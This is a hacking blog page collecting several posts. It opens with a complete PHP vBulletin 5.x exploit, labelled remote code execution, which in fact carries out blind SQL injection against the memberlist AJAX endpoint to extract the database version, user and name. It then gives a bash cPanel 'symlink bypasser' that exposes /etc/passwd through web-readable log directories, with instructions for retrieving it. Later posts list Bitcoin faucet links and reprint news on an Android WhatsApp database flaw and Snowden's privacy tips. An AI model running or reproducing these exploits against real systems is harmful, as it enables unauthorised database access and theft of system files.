[+] Wayc0de's Blog[+]

19/09/14

vBulletin 5.x Remote Code Execution Exploit

<?php

/*
    Author: Nytro
    Powered by: Romanian Security Team
    Price: Free. Educational.
*/


error_reporting(E_ALL);
ini_set('display_errors', 1);


// Get arguments


$target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
$expression = str_replace('/', '\\/', $target_url);


// Function to send a POST request


function httpPost($url,$params)
{
    $ch = curl_init($url);


    curl_setopt($ch, CURLOPT_URL,$url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
   
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
        'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Accept: application/json, text/javascript, */*; q=0.01',
        'X-Requested-With: XMLHttpRequest',
        'Referer: https://rstforums.com/v5/memberlist',
        'Accept-Language: en-US,en;q=0.5',
        'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
     ));


    $output = curl_exec($ch);
   
    if($output == FALSE) print htmlspecialchars(curl_error($ch));


    curl_close($ch);
    return $output;
}


// Function to get string between two other strings


function get_string_between($string, $start, $end)
{
    $string = " ".$string;
    $ini = strpos($string,$start);
    if ($ini == 0) return "";
    $ini += strlen($start);
    $len = strpos($string,$end,$ini) - $ini;
    return substr($string,$ini,$len);
}


// Get version


print "\r\nvBulletin 5.x Remote Code Execution Exploit\r\n\r\n";
print "Version: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1  ,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];
   
    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(  ),' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Get user


print "\r\nUser: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1  ,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];


    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Get database


print "\r\nDatabase: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),  1,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];


    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),  ' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


print "\r\n"


?>

Sumber  Read More...

CPanel Symlink Bypasser

#!/bin/bash
# ______ __ ____ ___
# / ____/___ ____ _____ ___ / / / __ )__ ______ ____ ______________ _____ _ _< /
# / / / __ \/ __ `/ __ \/ _ \/ / / __ / / / / __ \/ __ `/ ___/ ___/ _ \/ ___/ | | / / /
# / /___/ /_/ / /_/ / / / / __/ / / /_/ / /_/ / /_/ / /_/ (__ |__ ) __/ / | |/ / /
# \____/ .___/\__,_/_/ /_/\___/_/ /_____/\__, / .___/\__,_/____/____/\___/_/ |___/_/
# /_/ /____/_/
############################################
# CPanel Symlink Bypasser [Public Version] #
# By Hannibal Ksa (@r00t3rz) & R3m0t3 Nu11 #
# alm3refh.com © Group XP 2014 #
############################################
#
# USAGE:
# 1. UPLOAD ME IN /home/user as Cpbypass.sh
# 2. GO TO CRON JOB
# 3. ADD THIS COMMAND:
# echo "Alm3refh bypass" ~| bash Cpbypass.sh -s "Alm3refh bypass" -- email@gmail.com
#
# email@gmail.com = your email
#
#
# THE FILE WILL SHOW YOU HOW TO SEE/DOWNLOAD YOUR SYMLINK!
# PS: ENJOY!
#
#
##########
# FILE #
##########
SYM="/etc/passwd"
########
echo ""
echo " ______ __ ____ ___"
echo " / ____/___ ____ _____ ___ / / / __ \)__ ______ ____ ______________ _____ _ _< /"
echo " / / / __ \/ __ \`/ __ \/ _ \/ / / __ / / / / __ \/ __ \`/ ___/ ___/ _ \/ ___/ | | / / / "
echo " / /___/ /_/ / /_/ / / / / __/ / / /_/ / /_/ / /_/ / /_/ (__ |__ ) __/ / | |/ / / "
echo " \____/ .___/\__,_/_/ /_/\___/_/ /_____/\__, / .___/\__,_/____/____/\___/_/ |___/_/ "
echo " /_/ /____/_/ "
echo " CPanel Symlink Bypasser [Public Version]"
echo " By Hannibal Ksa & R3m0t3 Nu11"
echo ""
echo ""
########
rand=bypass$(( $RANDOM % 10 + 100 ));
###
# 1st 3xpl017
###
ln -sf $SYM tmp/analog/$rand.html
echo ""
echo "1st Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/tmp/user/analog/$rand.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo "cpsession=cpanel user"
echo ""
###
# 2nd 3xpl017
###
ln -sf $SYM tmp/webalizer/$rand.html
echo ""
echo "2nd Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/tmp/user/webalizer/$rand.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo "cpsession=cpanel user"
echo ""
###
# 3rd 3xpl017
###
ln -sf $SYM tmp/webalizerftp/$rand.html
echo ""
echo "3rd Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/tmp/user/webalizerftp/$rand.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo "cpsession=cpanel user"
echo ""
###
# 4th 3xpl017
###
ln -sf $SYM logs/$rand.doc
echo ""
echo "4th Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/frontend/x3/raw/index.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo ""
echo "THEN SCROLL DOWN 'TIL YOU SEE bypass.doc AND DOWNLOAD IT!"
echo ""
# DONE of the public version!
# E0F
Read More...

21/03/14

Listing Website Free Bitcoin Part 1

Free Bitcoin? yah bener sekali

Disini saya akan membagikan beberapa situs yang bisa kita gunakan untuk mendapatkan bitcoin secara gratis. Ada yang harus mengetik captcha ada juga yang harus menunggu beberapa menit atau jam dan lain sebagainya.

So, Cekidot bro !!!

ROLL & DICES

1http://cur.lv/8f7nz (FreeBitCoinWin) 1 jam untuk 1x ROLL
2.  http://cur.lv/8f7px (FreeBitCoin) 1 jam untuk 1x Roll
3. http://cur.lv/8f7qy (BTCFreeGame)
4. http://cur.lv/8f7s1 (999Dice)
5. http://cur.lv/8f8fq (gratisbitco)
6. http://cur.lv/8f8nb (phambit) 1 jam untuk 1x menggambar

sekian dulu info tentang website yang menyediakan bitcoin secara gratis, nantinya bakalan saya share lebih banyak lagi.

regards : Wayc0de
Read More...

13/03/14

Hackers can steal Whatsapp conversations due to Android security flaw

A SECURITY VULNERABILTIY in the Android mobile operating system has been discovered that can allow cyber criminals to steal conversations from users of mobile messaging service Whatsapp.
Discovered by Bas Bosschert, the CTO of startup company Doublethink, the flaw was detailed in a blog post in which Bosschert demonstrated the method for accessing Whatsapp chats. He confirmed that the vulnerability still exists even after Google updated the Whatsapp app just last week.
The exploit is possible due to the Whatsapp database on Android being saved on the SD card, which can be read by any Android application if the user allows it to access the card.
"And since majority of the people [allow] everything on their Android device, this is not much of a problem," Bosschert said, noting that this is an issue in the Android infrastructure, specifically a problem with Android's data sandboxing system, as opposed to a security flaw in Whatsapp.
From there, a malicious app could access the Whatsapp conversation database, Bosschert said, testing his method with a companion app that he built, which uses a loading screen to distract the user while the database files are being uploaded.
Bosschert said that he can even decrypt the database with his own script despite the Whatsapp application's attempts in its recent update to encrypt the database to the point where it can't be opened by SQLite.
"We can simply decrypt this database using a simple python script," Bosschert said. "This script converts the [encrypted] database to a plain SQLite3 database.
"So, we can conclude that every application can read the Whatsapp database and it is also possible to read the chats from the encrypted databases. Facebook didn't need to buy Whatsapp to read your chats."
The full step by step guide for how he hacked Whatsapp can be found in Bosschert's blog post.
Whatsapp added privacy features and the ability to pay for a friend's subscription when it updated its Android app on Monday.
The added privacy includes controls for users to hide when they were last seen, their profile photo and their status updates from prying eyes.
While these are not groundbreaking changes, releasing a privacy update likely will appease its user following Facebook's $19bn acquisition of the company that has sparked privacy fears among Whatsapp users. These concerns are ongoing, as privacy groups called for the FTC to investigate the buyout last week, saying that it represents a threat to privacy
Read More...

How to Use Edward Snowden’s Three Tips for Digital Privacy

Former NSA contractor Edward Snowden says he has been able to outfox U.S. officials using encryption. During a webcast on NSA leaks and data security at the South by Southwest conference in Austin, Texas, Snowden shared some privacy tips for the rest of us: Encrypt your hard drive, use plug-ins for your browser that prevent organizations or companies from tracking you online, and cover your tracks with Tor, an online network that promises anonymity.
These tips range from simple to complicated depending on your computer savvy, so we’ve collected some basic info and guides to help you get started:
Encrypt your hard drive
Encryption is the “Defense Against the Dark Arts” for the digital world, said Snowden, referencing the class Harry Potter took during his Hogwarts years.
Adding password protection to files on your computer is just the first step to personal file security. Encrypting the entire hard disk on your computer ensures personal information is secure, even if your device is stolen or seized.
Newer versions of Windows and Mac operating systems come with built-in disk encryption tools. BitLocker, which encrypts your entire hard drive, comes as part of Windows 7 Ultimate and Enterprise versions, and Windows 8.1 Pro and Enterprise editionsAppleoffer detailed tutorials online on how disk encryption services can be turned on. For those with older operating systems, TrueCrypt, there’s a free program for encrypting your drive. Here’s a guide on how to download and install it.
The Electronic Frontier Foundation, an organization that works on digital rights issues, has a guide to how encryption can help in different situations.
Use browser plug-ins to avoid being tracked onlineThe Wall Street Journal’s series ‘What They Know‘ showed companies are using digital tracking for online activities such as shopping, varying prices based on shopping patterns and location information. While that may seem harmless, it’s important to know that if retailers can see you, it’s likely that others can as well.
Slowly, companies such as Google have agreed to support a do-not-track button to be embedded in most Web browsers. Google’s Chrome browser has a setting that most users can turn on to send a do-not-track request, and so does Microsoft’s Internet Explorer 10. They won’t work with all websites, but it’s a good place to begin.
Plug-ins or small software extensions available for browsers are another way to go about it. Ghostery, a plug-in available for most popular browsers, when installed will show the number of trackers detected but not automatically block them. Users have the choice to individually or in bulk block these trackers.
You can also choose sites, such as the search engine DuckDuckGo, which do not record or share your searches.
Cover your tracks with Tor Over the last few months, Tor, a network that promises anonymity and privacy online has come under the spotlight. Tor hosts a network of websites, some of which have been under the scanner of law enforcement officials for illegal activities. Late last year, the Federal Bureau of Investigation shut down Silk Road, a marketplace available only through the Tor network, for the sale of illegal drugs.
Tor may be useful for criminals, but its cloak of anonymity is increasingly a comfort to anyone looking for privacy. Tor offers its own browser that can be used to connect to news sites or instant messaging services and chat rooms that can’t be easily tracked online.
To get started on the Tor network, take the advice of the ExtremeTech blog, and download the Tor Browser Bundle available for Windows, Mac and Linux. It’s similar to using the Firefox or Chrome browser but slower, because Internet traffic is routed through a series of proxies to mask its origin.
Other ways to lower your online profile include using encrypted chat services such as SilentCircle, and encrypted mail such as Hushmail. There are even smartphones coming out soon that will offer a suite of privacy features baked right in.

Read More...